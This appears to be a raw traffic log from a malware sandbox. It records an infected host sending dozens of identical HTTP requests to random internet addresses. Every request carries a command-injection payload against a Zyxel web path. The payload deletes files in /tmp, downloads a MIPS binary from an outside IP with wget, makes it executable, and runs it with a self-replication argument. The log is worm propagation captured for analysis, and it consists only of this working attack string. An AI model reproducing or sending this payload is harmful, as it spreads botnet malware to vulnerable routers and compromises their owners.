                                                        Jan 28, 2024 10:13:01.575721979 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6521192.168.2.1446490139.108.153.74443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.575743914 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6522192.168.2.1444188103.166.153.148443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.575794935 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6523192.168.2.1457488135.130.159.45443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.575839043 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6524192.168.2.145023871.245.195.106443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.575858116 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6525192.168.2.1457738204.8.153.200443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.575900078 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6526192.168.2.1440046130.251.191.99443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.575926065 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6527192.168.2.1438610222.15.92.58443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.575970888 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6528192.168.2.145686659.60.161.235443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.576005936 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6529192.168.2.145588644.2.182.1443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.576030970 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6530192.168.2.1442992100.54.102.26443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.576067924 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6531192.168.2.145549619.198.94.193443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.576102972 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6532192.168.2.144357663.77.90.114443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.576138020 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6533192.168.2.1450570220.204.43.238443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.576164961 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6534192.168.2.1455876105.108.140.13443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.576203108 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6535192.168.2.145827636.78.11.102443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.576221943 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6536192.168.2.1450038186.92.255.107443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.576276064 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6537192.168.2.1454612212.71.42.196443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.576323032 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6538192.168.2.144270279.228.182.254443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.576364040 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6539192.168.2.1442624159.154.72.210443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.576383114 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6540192.168.2.144030018.29.115.249443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.576431036 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6541192.168.2.144369612.16.187.229443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.576466084 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6542192.168.2.1437994112.206.151.107443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.576512098 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6543192.168.2.145000899.252.9.10443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.576567888 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6544192.168.2.144156434.130.77.11443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.576591969 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6545192.168.2.1432792118.216.105.254443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.576623917 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6546192.168.2.145904243.71.170.83443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.576658964 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6547192.168.2.1449938178.198.249.223443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.576716900 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6548192.168.2.143925480.190.113.4443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.576739073 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6549192.168.2.1445872134.255.217.57443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.576787949 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6550192.168.2.144172845.254.135.156443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.576812983 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6551192.168.2.144578679.198.186.172443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.576858997 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6552192.168.2.144297632.36.78.46443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.576873064 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6553192.168.2.1452272136.56.45.20443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.576925039 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6554192.168.2.1460442148.5.64.56443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.576965094 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6555192.168.2.1433350105.122.19.21443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.576994896 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6556192.168.2.144089453.119.169.127443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.577044010 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6557192.168.2.144403092.214.0.97443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.577102900 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6558192.168.2.14491822.137.25.220443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.577121019 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6559192.168.2.145779437.58.87.162443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.577148914 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6560192.168.2.1455852173.20.113.79443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.577184916 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6561192.168.2.144934025.184.180.93443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.577265024 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6562192.168.2.1446670126.251.192.184443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.577269077 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6563192.168.2.1436994150.22.161.150443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.577305079 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6564192.168.2.1441760157.71.46.205443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.577349901 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6565192.168.2.145772489.82.127.8443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.577397108 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6566192.168.2.145397259.152.99.203443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.577430010 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6567192.168.2.1439300219.208.200.111443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.577462912 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6568192.168.2.1458582204.158.255.152443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.577503920 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6569192.168.2.1447630165.155.155.233443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.577545881 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6570192.168.2.144110213.223.89.224443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.577594042 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6571192.168.2.145858614.251.16.250443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.577636003 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6572192.168.2.1444194192.35.66.241443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.577672005 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6573192.168.2.1440150204.140.250.167443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.577709913 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6574192.168.2.1447476112.247.79.13443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.577742100 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6575192.168.2.146028013.168.235.218443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.577763081 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6576192.168.2.1444028102.49.137.209443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.577807903 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6577192.168.2.144702853.253.58.115443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.577845097 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6578192.168.2.146078814.127.250.151443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.577891111 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6579192.168.2.1460320174.34.172.127443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.577919960 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6580192.168.2.1459626155.218.114.26443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.577960014 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6581192.168.2.1458018177.211.142.55443
                                                        TimestampBytes transferredDirectionData
